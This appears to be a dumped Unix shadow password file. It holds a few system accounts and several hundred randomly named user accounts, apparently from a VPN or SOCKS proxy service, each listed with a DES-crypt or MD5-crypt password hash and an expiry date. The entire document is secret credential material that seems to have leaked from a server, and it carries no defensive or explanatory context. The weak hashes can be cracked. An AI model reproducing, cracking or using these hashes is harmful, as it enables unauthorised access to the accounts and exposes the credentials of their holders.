sshd:*:14642:0:99999:7:::
stunnel4:!:14642:0:99999:7:::
smmta:*:14642:0:99999:7:::
smmsp:*:14642:0:99999:7:::
USgK1k659d:itB/c13dN/u7E:14738:0:99999:7::14828:
vpn24socks:$1$g9C2d1Pg$TYfku0QfqwZzCCrihY5BQ.:14897:0:99999:7:::
2ee2JLMeiD:iteTHaYjXCmVg:14741:0:99999:7::14771:
jguv7VJ6ii:itFCIPugyoVGA:14745:0:99999:7::14775:
sOxNXOP2PV:itiUb2mQGkMAM:14748:0:99999:7::14776:
IlE6hFCCQ9:it8sjuBu2UwmA:14758:0:99999:7::14788:
gxCDRFriLl:itATXQT/mvNEM:14759:0:99999:7::14927:
BulLYDNolq:it8SLiNmaP0kI:14760:0:99999:7::14790:
cEzN80h8BB:itl5alHHHRj/o:14761:0:99999:7::14791:
A49RKGrvdB:it.aXsDvAydCw:14761:0:99999:7::14791:
3uUk7DToWo:itIVK64.gWJAA:14761:0:99999:7::14791:
4MMRD3G8gT:it7z/czHZ/4gg:14764:0:99999:7::14794:
QIhyvtXwum:it2ATBMSEZyuY:14765:0:99999:7::14795:
bX8CG70Z8o:itJijnCruWn6s:14765:0:99999:7::14855:
NGHZWVpVuu:itwnfwU18AQZ6:14765:0:99999:7::14855:
MkdEe0NgXc:itiOdqfUCvOOY:14765:0:99999:7::14867:
VP3ofYe5qa:it17IG/Js9Vck:14767:0:99999:7::14797:
s9wnq4iJbL:itF7GdfK4cHwA:14768:0:99999:7::14798:
JF23IDOEX0:itjVH5xatvIjg:14769:0:99999:7::14799:
GOE9IvxCo8:itUnwzzVvUvfI:14770:0:99999:7::14800:
2mAWybIfou:itxaq4qqSWmrM:14770:0:99999:7::14800:
ywLRB9sQG5:it/JoBv/eYT5U:14770:0:99999:7::14800:
U5wILkFczX:itS09vevC2cUk:14771:0:99999:7::14801:
qU247MmWWp:itGjgxFlOLsNY:14771:0:99999:7::14801:
JpE3P8WgBN:itz5J2D3BnylQ:14772:0:99999:7::14802:
OTx2pkLemc:itdrcEiHMAcmo:14773:0:99999:7::14803:
tLDp1920ug:itrlGlUwCXA2.:14773:0:99999:7::14803:
pzSoTppzAu:itYHMFEVKujMQ:14774:0:99999:7::14804:
fcz40nnjZr:itrE5RglVeq6I:14775:0:99999:7::14805:
1TEkAllzys:itCa0ysI.zviM:14776:0:99999:7::14806:
WMfvkEivY0:itEB014a/919s:14776:0:99999:7::14806:
4Vvq0LAF9r:itQa.hMitwqBk:14780:0:99999:7::14810:
QVMgMXxSeK:itjWbRYcqg68.:14781:0:99999:7::14811:
dtxSHwZpH3:itylRO//M3ToE:14781:0:99999:7::14811:
Uth54wPUPD:itJq7wfSkYO0Y:14781:0:99999:7::14811:
eCWEZEQZVq:itQpFlgIXcbIs:14783:0:99999:7::14813:
wp6WkrrhkH:itFOBdWM6twuU:14783:0:99999:7::14814:
QLGAfXHUAX:it0QHPOluaMyM:14785:0:99999:7::14815:
NWPWWWxBnh:itUf75Y/bENEQ:14785:0:99999:7::14815:
LY5yDIThxj:itcfUQF1iv2/I:14787:0:99999:7::14817:
LvJSd7KRCq:itHhdmnQ5K1BU:14788:0:99999:7::14818:
DNlBW8cww2:it34R5ynNPess:14788:0:99999:7::14818:
22JAEReAWb:itYK1kHANDxdk:14789:0:99999:7::14819:
1U7iYfKkZg:itBz2LEk.iv9c:14789:0:99999:7::15149:
A9RlGkkBly:it2GU6kR9pzQQ:14791:0:99999:7::14821:
ezjCz5tTLo:it4LXhsv8Gp3Y:14792:0:99999:7::14822:
CZ298VrwyT:itCaZtRbDIyXc:14793:0:99999:7::14823:
DDFFWPh13H:itzt.DXQW5/8Y:14793:0:99999:7::14858:
FwKPqLl9HO:itJtQGEkrPt12:14794:0:99999:7::15154:
4GA5FfwFEB:itbSS8sFdc0XI:14795:0:99999:7::14825:
6RyUaunr8w:itprojJIZZK5k:14795:0:99999:7::14825:
O2cPtoYJSA:itELh9gttdfwA:14795:0:99999:7::14825:
OieOTeMsVT:itmaN6.6K.hks:14795:0:99999:7::14825:
nqh2PPsJoX:itxfNQjUZHEPs:14795:0:99999:7::14825:
vLymjSZ2PC:it/91D7UOOkPg:14796:0:99999:7::14826:
BB22Ob0wRq:itN1e64V2oPNE:14797:0:99999:7::14887:
osHYLha9Xa:itTVoqQl2rXro:14798:0:99999:7::14828:
Mjs6t1fh7r:ituFJPgjyRlmo:14799:0:99999:7::14829:
DEZtQQ9XlX:ithmUxn.OIhQ2:14800:0:99999:7::14830:
GIVQTfHrFc:itYXpaa4uuO0A:14800:0:99999:7::14830:
6keWEVe8CF:it4Z4E1cdXWTI:14801:0:99999:7::14831:
f4rKlco33u:it340SfG3g5ZQ:14802:0:99999:7::14844:
7iVUdiWpZI:it1tZD4MEeonE:14802:0:99999:7::14832:
WBuxr9t5xJ:itppUICuI64vQ:14802:0:99999:7::14832:
9q9ZUnLTQd:itHZZD4CYjEd2:14802:0:99999:7::14832:
Aw1GQfhx6F:itypRPeiXHUDw:14802:0:99999:7::14832:
uurtXDhjEU:itrLEiUz1FSgs:14803:0:99999:7::14833:
G7lfd8zf1h:ithYIaAgjMZy.:14803:0:99999:7::14834:
EMY6T7qTGu:itKs8yYfyU7Bs:14803:0:99999:7::14833:
IzPTVGc4Yo:it4AQn9hNTDpk:14803:0:99999:7::14833:
4RmVWo7T4v:itI86zNOA452w:14804:0:99999:7::14834:
z9VTnI5JJX:itL2OMielYObw:14804:0:99999:7::14834:
qF7C1TR0he:ithzxC2YWnZMo:14804:0:99999:7::14834:
OxUqFE7v5H:it0ak6/xHcP3g:14805:0:99999:7::14835:
QluTWIEQSG:itH4r8I9fzUJg:14805:0:99999:7::14835:
APi3yQS9Dt:it49aPUsbfswM:14805:0:99999:7::14835:
KscYKlIxxP:itkBdUgq1XVUk:14805:0:99999:7::14835:
4OrVVMvg5b:itsUVdh9jlIKI:14806:0:99999:7::14836:
9q9wWck1iv:itW9jPOWvAS.M:14807:0:99999:7::14837:
7T3MmDDuYA:itcx4CkzJFETM:14807:0:99999:7::14837:
9i3rSA1t3B:it.SYvXlNGEL6:14807:0:99999:7::14837:
OG60AiIy32:itQwkvbyk2rbk:14807:0:99999:7::14837:
XQlGb5EDEX:it39CL0eAM7eM:14808:0:99999:7::14838:
gSPbDrdVM7:it.OYEbMgwySk:14808:0:99999:7::14870:
bn1XjaAbBO:ithpu.MOWcN2Q:14808:0:99999:7::14838:
eEAGLP58B1:itASzjdyZDpVo:14808:0:99999:7::14868:
19vuUOl1DA:itiI2y7mrWeoI:14809:0:99999:7::14839:
GJTBqAX0Po:it1Uu/W3WNcUw:14810:0:99999:7::14840:
YlKhbzOzlW:itedPh8uS.GGE:14810:0:99999:7::14840:
P1IEuRFxoc:itWvqWDbD7LPs:14811:0:99999:7::14841:
M74tz0c6cB:itvzbN7i9gD76:14812:0:99999:7::14842:
pxCR5mWYxl:it29eclf7EmX2:14812:0:99999:7::14842:
BYBEFkGPOv:itnT9MWIzJSMA:14812:0:99999:7::14842:
bLQLndsfG7:itOU5lmCywYyA:14812:0:99999:7::14842:
7RsRZ2UUu4:itJQWHjmDMSBg:14813:0:99999:7::14843:
gbWPMY3QUz:itMWiO7Rdw7j.:14814:0:99999:7::14844:
3DPSaYAK0I:itnXdG3B7xJJo:14815:0:99999:7::14870:
Mfa9YHsFwm:ittgjSkT2gj4k:14816:0:99999:7::14846:
MCdvro0waF:it3nns/B37m8A:14816:0:99999:7::14846:
4qTipZxa3g:it/TEdalbJMfM:14816:0:99999:7::14874:
jzJtLApQhG:itsr9y.rbSg4Q:14818:0:99999:7::14848:
MfJ1grnWz2:itGx1RoQ6IKB6:14818:0:99999:7::14877:
TKTlaudWc6:itPNHr6KpAPRQ:14819:0:99999:7::14849:
Pg6UVUT4Zi:itApd4kWtPxgI:14820:0:99999:7::14850:
7KxfsATvUY:it7TTxqh9nyK2:14820:0:99999:7::14850:
1YzAOqKyJU:it6ZiWQAL2wmU:14820:0:99999:7::14850:
ArAdFXiTdV:itvOH9eWcd6hE:14820:0:99999:7::14850:
Tyt6Mxbjb9:itkMpS8/7LT4E:14822:0:99999:7::14912:
p5TdBxcMOd:it5XCnCv7GOWc:14822:0:99999:7::14852:
HCj78QJ6bB:itV2E5FPhjv/Q:14823:0:99999:7::14853:
ataiqUNkhi:itFF/b/bbv4dg:14823:0:99999:7::14853:
BDnc11BaRR:itAgVwadM3n1o:14824:0:99999:7::14854:
0xs05pGnsc:itb2On91sFue2:14825:0:99999:7::14855:
6lCpT6Rtlb:itLieCtWiSNmk:14825:0:99999:7::14855:
MZGuvPmcQQ:itwBeYSCWzonc:14825:0:99999:7::14855:
S393KhVsS0:it0ImcxR03.Bc:14825:0:99999:7::14825:
hePPBhA3Zb:iteURoscPLWpE:14825:0:99999:7::14855:
xU33BmPZBt:itkHe9tsySfM2:14826:0:99999:7::14858:
8kTCqMWNer:itlb1jZxpEa4w:14828:0:99999:7::14858:
Z9mwX94DwA:it3WSVa8R07ls:14830:0:99999:7::14860:
QE70dT7Sk6:it0Tv1gANLfrw:14832:0:99999:7::15011:
3nRGuwyy3O:itRWTUESeEAnM:14832:0:99999:7::14862:
7lHu9x5ahz:itLFhHr4cMgEA:14832:0:99999:7::14862:
yQt4twcYHi:it9/qpjACWSpA:14832:0:99999:7::14862:
5QOvATUZRp:itkUCczUilUa6:14833:0:99999:7::14863:
qrIJmTNsip:itQn6yP0a1D3w:14834:0:99999:7::14932:
3MD6MyTcBm:itkGQqOqkAd6A:14834:0:99999:7::14864:
tX55vN8iBA:itVhqTDrPxB3E:14835:0:99999:7::14865:
MUF31iM1WD:it1bqY2btUtgc:14835:0:99999:7::14865:
6I1FTys1aV:it1G8ffMZkwBs:14836:0:99999:7::14926:
wH5nC1icK0:itsxFgyt7IG7.:14837:0:99999:7::14837:
z9GYUjVR9T:itW2tKlBIbklM:14837:0:99999:7::14842:
uiv8RD7GCm:itSRd/dT4W7ig:14837:0:99999:7::14867:
debug:$1$yShOv8Qf$hR6RSu48g2kUAOV18q23Q.:14837:0:99999:7:::
udewQStk6R:itqzk9aMNRAtI:14837:0:99999:7::14867:
YRfpne3P1W:it7MwZ1NA4Qg6:14838:0:99999:7::14868:
2G6ixqigXX:itYHt1qHMyxg6:14838:0:99999:7::14868:
FZ6nGPBlnq:itTB9Xib/.Jms:14838:0:99999:7::14868:
N4WUxGoeHX:itEmsj0kbt5Ig:14838:0:99999:7::14868:
3qoY48h6od:itzq1YDUTChmo:14839:0:99999:7::14869:
0KltTgDdxs:itjH.XV1RHImM:14839:0:99999:7::14869:
KnOIZkAYhv:itB/NLcosNZao:14840:0:99999:7::14870:
pduruQrvQw:itiNBdTTqSHXc:14841:0:99999:7::14871:
gfPh6U7BSL:itCwYFdL4JCUs:14842:0:99999:7::14872:
5d4PClWw9W:it8p4QD0G52a.:14842:0:99999:7::14872:
X3IwwuMhVn:itNC9p4Jw4Sew:14842:0:99999:7::14872:
9lKRF8UVul:itpPmVNnqzz8s:14843:0:99999:7::14875:
7OEkZFXfrj:itW9kD.grdiZc:14844:0:99999:7::14874:
XR9kXMus18:itup25xiWxlJE:14844:0:99999:7::14874:
LeJdtNDj0s:itu.0zdvPYBqU:14844:0:99999:7::14874:
sMdDwKbykL:itUWFJ7x2CEvE:14844:0:99999:7::14874:
RLPQ9lCkkg:itSEmJMpmRKuY:14845:0:99999:7::14875:
m07JSN8S1t:ithZZB/vxmf9s:14845:0:99999:7::14875:
KoW5ucmliR:itbs5gLqLFQ6U:14845:0:99999:7::14875:
vxaNuWuV5A:itQ/9L7nfjCGs:14846:0:99999:7::14876:
r6cQANOWcM:iteuR8tiYJc0A:14846:0:99999:7::14876:
GefhxHzMLB:itbcf7Sdv5haA:14847:0:99999:7::14877:
gghzgxMlzK:itv2DXUhR8k.E:14848:0:99999:7::14878:
dTECuvvcnY:itjIptA916Ebc:14848:0:99999:7::14878:
teamsocks:itt.x7Yyh3o4c:14848:0:99999:7::15706:
2ZzW1TPwek:italJuFQJ5a3s:14850:0:99999:7::14880:
98pASZD7ZL:itxSgbMMIp5Ss:14850:0:99999:7::14880:
rgNCfMxMDE:itUv8r76CvnFE:14852:0:99999:7::14942:
TPJNO6U7gB:it3nK7o5rGQTs:14854:0:99999:7::14884:
ZfQAMBcfd9:itn/Ahnp4SGYI:14855:0:99999:7::14885:
DWJLuNgRHq:it7fcSOrx.qzs:14856:0:99999:7::14886:
26PWTAtsMQ:itp0wE97MeJeY:14856:0:99999:7::14886:
wiDxLyK5di:itGyNef3zsBUc:14856:0:99999:7::14886:
OOueJqB7Ux:itLOQI2IJENTA:14856:0:99999:7::14946:
EaDZkcpMhf:itabLuw41OymE:14856:0:99999:7::14886:
swj3AHcyct:itgTFah5u7zEE:14857:0:99999:7::14887:
tf1x5jgZf7:it5.he.1J8Tos:14857:0:99999:7::15217:
fTkJjFodJR:itlImxgGtzX8E:14858:0:99999:7::14888:
q8Ospeoqjm:itfK2S6qHfdY.:14858:0:99999:7::14888:
atIdo8CMgl:itDJAu0FCjkD6:14858:0:99999:7::14888:
AIVtIPpwbI:it./a4jMDch9s:14858:0:99999:7::14888:
83ssqOi2mG:itf5ysL1ik1Uo:14859:0:99999:7::14889:
mDhIWzTPpL:itlbdpvX.70XI:14859:0:99999:7::14889:
aw1h0yzOXG:it7nEFlm.U1HE:14860:0:99999:7::14890:
8aXdZvgEAL:itHvOP3gWy0Ek:14860:0:99999:7::14890:
7DpjZkkKRH:it8lCum3QfKEE:14861:0:99999:7::14952:
AA4KnP2gQo:itYZtCLpMWh.6:14861:0:99999:7::14891:
OdJUE9NXz0:itPdSjh4MZGNk:14861:0:99999:7::14891:
WRwA7CA595:itk9xrbc96b6k:14862:0:99999:7::14892:
UHJXsI3u7T:itvRm6Pm8LxZs:14862:0:99999:7::14896:
AfPMi3Orqx:itK3vLE/cImqE:14862:0:99999:7::14892:
IIpk9TW4Hy:itjUMQ7TIWFks:14863:0:99999:7::14893:
GfXK6QYZvV:itEba4yQ5bD7Y:14863:0:99999:7::14893:
O2JLXab4Qb:itCguhLtUWcso:14864:0:99999:7::14894:
abobJxNBqT:itPzo69efPDNI:14865:0:99999:7::14895:
PAZYQvYMzp:itJXiA.Q6LtCs:14865:0:99999:7::14895:
mein:itz93owDvH2ig:14868:0:99999:7::14975:
In1AVHseTI:its.B5WuD6CPI:14868:0:99999:7::14898:
1yNGl2LCqo:itfhGvLrzeOro:14869:0:99999:7::14899:
UcblLYHagd:itrGN5VJ63iv2:14870:0:99999:7::14908:
GXFmqv0v6j:it4egLMyCOPXQ:14870:0:99999:7::14960:
eb0MkURFMR:iteVQ0NCSyuz2:14871:0:99999:7::14901:
ZF0P5R5HY1:itYKl7wO/tN6w:14871:0:99999:7::14901:
raiesY1Uya:it9XdP1qAJmpI:14871:0:99999:7::14961:
6vWXOICD5H:itAlbixHt8.fY:14871:0:99999:7::14901:
EHgdxvxbz6:it6FuhzCGg6TA:14871:0:99999:7::14901:
A9cAJOMNCY:it57H1zG3qv.Y:14872:0:99999:7::14901:
tHx7Nh5Kfp:itaW6Jr4ZZU.A:14874:0:99999:7::14979:
cvs7ZHnMch:itqel0UM7hH0k:14874:0:99999:7::14904:
R2XHmC62ZS:itSJbO1UjIVk.:14874:0:99999:7::14904:
OthdQ1Nmh5:itHAEGeiEMFhc:14874:0:99999:7::14905:
bhUizLPv0M:itHrknSzaql8U:14875:0:99999:7::14905:
FqBNIU3BXX:itL7IoJ8HGtjQ:14875:0:99999:7::14905:
cYuowtqfqp:it7vPDLMFamNU:14877:0:99999:7::14913:
ohLtOJoye9:itDe3UkvVMw/o:14877:0:99999:7::14967:
0xlfaHuCkh:itgwvKix98Szs:14879:0:99999:7::14909:
9oaRxjmjhy:itG4hyGTxFl9U:14881:0:99999:7::14911:
8YNxD3ah6D:itg0cQ4Ya.K2A:14881:0:99999:7::14911:
vd8oJtJgZr:itkGNuz.DvpB.:14883:0:99999:7::14913:
NwIUjcCYZG:itn7cOK0MxTPU:14884:0:99999:7::14914:
4nduuzyTQx:itmTdvrcDqztk:14885:0:99999:7::14915:
9qAqHLtLBx:it1RA5I5xwmyo:14886:0:99999:7::14939:
tuy9erQgxJ:itz9g1V7Y1Vog:14886:0:99999:7::14916:
GMunVltQvi:itlZMoR4eis5Q:14887:0:99999:7::14917:
sqYWjLaKXf:itaBZ/6eFpuME:14887:0:99999:7::14917:
ymLHzXSVjD:itiepJpQGPLR2:14888:0:99999:7::14918:
cG6fOsmfgT:itVe1Sv269.cE:14888:0:99999:7::14918:
Xv02xz1TQc:itNvLoD4b2F2U:14888:0:99999:7::14918:
13rRlbMsXc:itBiYQEEILlTA:14889:0:99999:7::14919:
o1NbEhdi1P:it5mVEaFWNf1.:14892:0:99999:7::14922:
SvOn61Ck0K:itTHDnZHL3bH6:14893:0:99999:7::14923:
LykwDkKp22:itk3nH54N5/lA:14894:0:99999:7::14924:
gDFHnIx6gq:itCJAnpVw.1oE:14894:0:99999:7::14929:
BQBra5cl9R:itxMiTR8/w.HU:14894:0:99999:7::14953:
4DaHNYAOXR:it/K.0bHmCxBM:14894:0:99999:7::14924:
mybkiYHe4L:itHs/OAKJg9PA:14895:0:99999:7::14935:
EZPpg2A55v:itUuxKhoP1VMI:14895:0:99999:7::14925:
ZtLdtMOxjz:itvFAdL7qAoAs:14896:0:99999:7::15256:
zyDY1v3Ifs:itxQpXl2lf5sw:14897:0:99999:7::14927:
vk9rnSCr7X:itjnkjv6.SGWY:14897:0:99999:7::14927:
nBeRUhO19Z:itPauEauIQk66:14897:0:99999:7::14927:
TeXbvEj3oJ:itr2mNVe6XTuo:14898:0:99999:7::14928:
2Fr6Xq4WyM:it3/yboYrUhVg:14898:0:99999:7::14928:
yZsxPqnHdR:itabo7ALxf5rQ:14898:0:99999:7::14928:
uQ4lOfB4g0:it/PdCIWid8A6:14898:0:99999:7::14988:
tMOYcIGsBO:itPslV9tgLazM:14899:0:99999:7::14929:
rbcBkgkMCF:itdT/Uyv7HH.c:14899:0:99999:7::14989:
r0FjhxSADo:itSltUoI6eVvI:14899:0:99999:7::14929:
88rM31v2oJ:itwg7qhCbYMag:14899:0:99999:7::14929:
d3rdsSAt5s:itWSsOAmAXv/s:14900:0:99999:7::14990:
frpOFX7CGJ:ituk9m0heMvJ.:14900:0:99999:7::14930:
DN4SdAwDUX:itqnCyrFKN/gM:14900:0:99999:7::14930:
SWsT6SYBW0:itv7UN0iZGIDo:14901:0:99999:7::14931:
mqdlYki3Bu:itoLRPE/V.0qY:14901:0:99999:7::14931:
Kf6hkNRFbt:itMMt7WyGBLmY:14902:0:99999:7::14932:
VRKabwxsRz:ithk9weHHtqcc:14903:0:99999:7::14933:
W149pluZd9:itx/z6pbrhv3I:14903:0:99999:7::14933:
UzPuS4CkgJ:itoICMixQ6M8Q:14904:0:99999:7::14934:
UsGU5GLZmf:it7aNFj10DUTs:14904:0:99999:7::14934:
r4xLEdMjeu:itHsIkGueCPbk:14906:0:99999:7::14936:
lutZaKA8pP:itc61fNMFA/3E:14907:0:99999:7::14936:
usDgH6KNsm:itd06qFZIEABM:14907:0:99999:7::14937:
CMSc3fnm0o:itI3zX6jizp9o:14907:0:99999:7::14937:
vYwuL6Uwia:itcM5h0kqE6Ow:14908:0:99999:7::14938:
yaSgVmndrd:it3y5K4Adi7w6:14909:0:99999:7::14939:
dfvW2pna2L:itINr2NMjgQpM:14910:0:99999:7::14940:
ng3LKLliu1:it7C53g6Lz48A:14912:0:99999:7::14942:
8SVb2iLNbA:itOjHA6.KhcCk:14912:0:99999:7::14942:
3aiHc3W1co:itZc.Y8xjdHo6:14913:0:99999:7::14942:
mON9q5Awho:itk.QmqSq0R9I:14913:0:99999:7::14943:
FRXf5cUHNA:itkv83lbiIlDQ:14913:0:99999:7::14943:
X2w1wWC8cc:itAZHmcDJATPY:14914:0:99999:7::14944:
KbZzI1EGD7:itQYRLQgetcXo:14914:0:99999:7::14944:
vwX6HwC8Lh:itIBgY/SDaCf2:14914:0:99999:7::14944:
YbDmrQ3uHX:itwHmpepzmsyo:14914:0:99999:7::14944:
XwrlqzZcqt:itUzpgEXgBeQY:14914:0:99999:7::14944:
Zr5u4mLaor:itfloQkXhD5u6:14915:0:99999:7::14945:
yRkX9kmf4d:it8vky1.FP1v.:14915:0:99999:7::14945:
VPPl3s7YUL:itiEkuDw5DI7g:14916:0:99999:7::14946:
OTgrnEWUwc:itOt0S/uMUf4M:14916:0:99999:7::14946:
G0OREuDm37:it3eS6p4sq3Zc:14916:0:99999:7::14946:
CQyjF4u7CS:itlt3wTyLL1mY:14916:0:99999:7::14946:
XwU6xeJKMx:it/6xa8WMPDh.:14917:0:99999:7::14946:
aklcI4G2Hr:itznhpJlcPCLE:14917:0:99999:7::14947:
mT7JPIqVuf:itw4vdCKM5hh6:14917:0:99999:7::14947:
gsZxRf05sx:it5HQlC6kFh4k:14917:0:99999:7::14947:
v716hX8oaW:itEqiR8DNv1qA:14919:0:99999:7::14949:
Mmh3M4oP0v:itOBibBZTmXD6:14920:0:99999:7::14950:
ctV3NEzitO:itBbFVXGBG4BU:14920:0:99999:7::14950:
wKer3VQNa8:itnDVU6wdMvG.:14921:0:99999:7::14951:
76BuKJAIQs:itQPcXWud8yfg:14921:0:99999:7::14951:
k1dO6lfMNd:it90nC0giFbtw:14922:0:99999:7::14952:
I6J3JHUqC1:it/srYUBNHo9M:14922:0:99999:7::14952:
GYoFHeDm0z:itBQLqu6UxphI:14922:0:99999:7::14952:
72YV5GHBVx:itQ8ASN1Cpbfk:14923:0:99999:7::14953:
G71wfQEPoC:itVuq/dID19J6:14924:0:99999:7::14953:
HgcCrXDKen:itKN1JIcX0nBw:14924:0:99999:7::14954:
gbzSM7ywwW:itT7p0thywHrI:14925:0:99999:7::14954:
dfJJwbDOaG:it8swpmidw2XI:14925:0:99999:7::15015:
4Saf8LwCcR:it9dSQLwlJtIs:14927:0:99999:7::14957:
1eeUWOlK9E:itzm7AcIRfnxY:14928:0:99999:7::14987:
Cll4KDM0W3:ita3TIkuFg1/2:14929:0:99999:7::14958:
OJAEWyDwCI:itqAL74wVHS9w:14929:0:99999:7::15019:
q1iyUEbI5V:itqyIpWotaOKY:14930:0:99999:7::15020:
2N1Uo47Mlg:itxcvxQxkmIJw:14931:0:99999:7::14961:
ruVtSN24pr:it3hysvh0JWzg:14932:0:99999:7::14962:
zJltMD4mG9:itTv938Zg94SM:14934:0:99999:7::14964:
WkUUS9RQf0:it.o2Ii05q/rQ:14934:0:99999:7::14964:
bWauNdcsMn:itRPpz0Y9lxlg:14934:0:99999:7::14994:
S5UKpRwg51:itNLqhJ7Hekt2:14934:0:99999:7::14964:
stFt5RwE33:itIYMTiTEIJFA:14935:0:99999:7::14965:
OCUbNto6Bg:itwtuO08u6Whk:14935:0:99999:7::14965:
eIxatCSG1U:itZchcu.o/waE:14935:0:99999:7::14965:
zXcXCYaIpo:it7JduWDCGa7I:14936:0:99999:7::14966:
RBNgJIRt49:itHHvqlfsenFs:14936:0:99999:7::14966:
niSxFcVo6S:itxdORWkQMuLU:14936:0:99999:7::14966:
Uxx9MvILLz:itonzxA2QqSCo:14937:0:99999:7::14967:
klYUlzI7cK:it5P8KkyhBUx.:14938:0:99999:7::14968:
6m9Y1QaKr3:itdviqsn/UOgM:14938:0:99999:7::14968:
lVXZHCarqJ:ittqGaCR7CVzY:14938:0:99999:7::14968:
4GWL9WXzxF:itmpwb3peAPso:14938:0:99999:7::14968:
JxaTdAV8Rw:itJeetI8t0THk:14938:0:99999:7::14969:
8P7jKJ2Nlh:itcCo7MW2z5c2:14939:0:99999:7::14969:
vkE7Afv1aW:itxj1CCnY0KVU:14939:0:99999:7::14969:
2Er5XcDGWA:itVQQjFaoLsVs:14939:0:99999:7::14969:
qwBUev5nEp:ityFIjDrBhcMY:14939:0:99999:7::14970:
muIspwxptl:itGdEXkF3KasY:14939:0:99999:7::14970:
e5yhvJdeTw:itcISq4222ADM:14940:0:99999:7::14970:
XUxzr4xMlT:itxh06MdAbfAc:14940:0:99999:7::15030:
va20H8Ol9R:itGRrgpip6fho:14940:0:99999:7::14970:
qsAbm8ZMyg:it3Ob3nUJuqU.:14940:0:99999:7::14970:
9An1Ctk2Qa:it2SEn0lMti9k:14940:0:99999:7::14970:
Ey5cDS72xR:it6G5reVhlop2:14940:0:99999:7::14970:
uCUqoIdGPa:itZuCKn5tD7XE:14941:0:99999:7::14971:
N6fG120epq:itVuvFFxaDk8E:14942:0:99999:7::14972:
gV0gXSFPQ8:itwtoSkg28amA:14942:0:99999:7::14972:
FvxPhU3XUz:itFgdFZMSk67A:14942:0:99999:7::14972:
iYoWJEuIeo:itPSTarGMLfTY:14942:0:99999:7::14972:
ybLYgoCPNG:itjTsMk3pE7e2:14944:0:99999:7::14974:
Z6pSiUldwy:ityDkEl8UvQc6:14944:0:99999:7::14974:
TkRcTTkRSF:itlk29O.cDvaE:14944:0:99999:7::14974:
wHgs7nrMld:it9XlfjywiXy6:14944:0:99999:7::14974:
nUYfzYpR4G:itvgu.6SeYDs6:14945:0:99999:7::14975:
8tEhjjRlAC:ithIZGhH1YWGs:14945:0:99999:7::14975:
JpChWSSU54:itmC7n8H/IzOI:14946:0:99999:7::14976:
EnwaHzdt35:itW5rIFvNIESI:14947:0:99999:7::14977:
juTd17x1Nc:itdIXw1efcit2:14947:0:99999:7::14977:
TOTQ91BEwS:itETt4OL8daUg:14947:0:99999:7::14977:
6UTA6cTgc2:it/jPTOoUX7RU:14947:0:99999:7::14977:
93EP0GUfGC:itjZCu2VpVTto:14947:0:99999:7::14977:
N66NJ15WGg:itvfxHbWSpAGs:14948:0:99999:7::14978:
yXmWg290xo:itd6FNm6EstQo:14948:0:99999:7::14978:
rcc6AHS1Jg:itaW/avCpeX7I:14949:0:99999:7::14979:
zXMmeDGbqP:itbKfASBg5kjQ:14949:0:99999:7::14979:
7tdzW87F9R:it59iCPlIQ2nI:14949:0:99999:7::14979:
dpswkJLMwG:itq8CorTAKvbQ:14949:0:99999:7::14979:
azsvod1Qyg:itVYBbnLQOXvs:14950:0:99999:7::14980:
72ju0LjHvy:it1M93rvoYWOs:14950:0:99999:7::14980:
73yatKHdOE:itgExui2oxI6k:14951:0:99999:7::14985:
UWC2JU92e0:itqqXARCLiWbI:14951:0:99999:7::14981:
i1BmroAIeM:itLVHBV2drUzk:14951:0:99999:7::14981:
8sAlXL7Ibr:it64Q2stSnBHA:14953:0:99999:7::14983:
kk2M3z5gcp:itBHe6tqX.3XA:14953:0:99999:7::14983:
9cK5xC48nV:itl87NEjGEK2w:14954:0:99999:7::14984:
SBAetxCLTy:itnnHODH7U6ss:14954:0:99999:7::14984:
8iZ9BfefaC:itqzc7PIHyg9U:14955:0:99999:7::14985:
D73JHDlBCn:it5HRy53l43Y6:14955:0:99999:7::14985:
OkpQWghNPU:it./ezuDx/YQE:14956:0:99999:7::14986:
gUADWitYGX:it/KOoOhBksMA:14956:0:99999:7::14986:
DaGvQaxltT:itLrqA5G31PN2:14956:0:99999:7::14986:
pBw5St2oIK:it553jDzNAPfc:14956:0:99999:7::14986:
f37WEzjkBK:itwnTkJDchqME:14956:0:99999:7::14986:
23101kMksS:itGlGqE/KXM32:14956:0:99999:7::14986:
OmXdWCH5Fq:it1RlH2X7DVAM:14957:0:99999:7::14987:
6HRKiqn5AS:it1T38X6cuM6c:14957:0:99999:7::14987:
p8aQLoUmKx:itrg.SUskuxyg:14957:0:99999:7::14987:
31YimlYNtc:itpkbpgDGcZ.s:14957:0:99999:7::14987:
P6q1AGVRjm:itkyYcDlznPYE:14958:0:99999:7::14988:
lK7CY8gP5z:ithVNEA6Zp2sY:14958:0:99999:7::14988:
y5MJDV3DL9:itpXG8NQzmABo:14958:0:99999:7::14988:
qAcEd9FYMX:itVRMAu6wGMC.:14958:0:99999:7::14988:
GpEu7dTAI7:itB3YWx6ee0SY:14959:0:99999:7::14989:
MSMzq0euqr:itiISfOIxsxaE:14959:0:99999:7::14991:
inlnCLfVUo:itvhTbyWymA22:14960:0:99999:7::14990:
ollSVqKLpa:itVpMPYmRMELQ:14961:0:99999:7::14991:
s2C71Wifr9:itFk8miODAIbI:14961:0:99999:7::14991:
UxsvWRQWBq:it7xuKEJ86nZ6:14962:0:99999:7::14992:
QY6arE2Ydq:itHpW7AaspT.w:14962:0:99999:7::14992:
b5sNwDdmEK:itmvq9eooqmO6:14962:0:99999:7::14992:
pdpUuNAtXK:it0R6bx0FyZlE:14962:0:99999:7::14992:
NxsMofNyV2:itLK/56KKYaog:14962:0:99999:7::14992:
DtzoQ2Xw7q:itYVSREQMSdBw:14962:0:99999:7::14992:
tDBq7HfG3r:itzVytgnZiSAU:14963:0:99999:7::14993:
f8cDerX7wf:itFrqaj9jTUlU:14963:0:99999:7::14993:
QoTkaCA5hf:itiV6gqc74Sqw:14963:0:99999:7::14993:
Lmh9L2R8qz:itd7geSqRbFrk:14964:0:99999:7::14995:
kzgMwiKIDN:itT6bPP4kO.Rw:14965:0:99999:7::14995:
6pFUWCUnmw:itvTnr5tKE9Qw:14966:0:99999:7::14996:
Pgh2JWajwc:itoBQz08YAmFY:14966:0:99999:7::15056:
PKSb4b3iAN:itnJSnuTJIPf.:14966:0:99999:7::14997:
5DeP78tYXf:itSvfA1ftcp52:14967:0:99999:7::15327:
ZDrNQotOat:ithoGBbOmxVC6:14967:0:99999:7::14997:
rd5t8jfvnj:itgFK3/lIbbHk:14970:0:99999:7::15000:
vuqRa4K55i:itnwIbDrEdQQ.:14972:0:99999:7::14972:
itMjMX8Zgb:itvQs9lGWMpPE:14976:0:99999:7::15006:
MyxPyfxyxX:it4om/OGRqVaQ:14977:0:99999:7::15007:
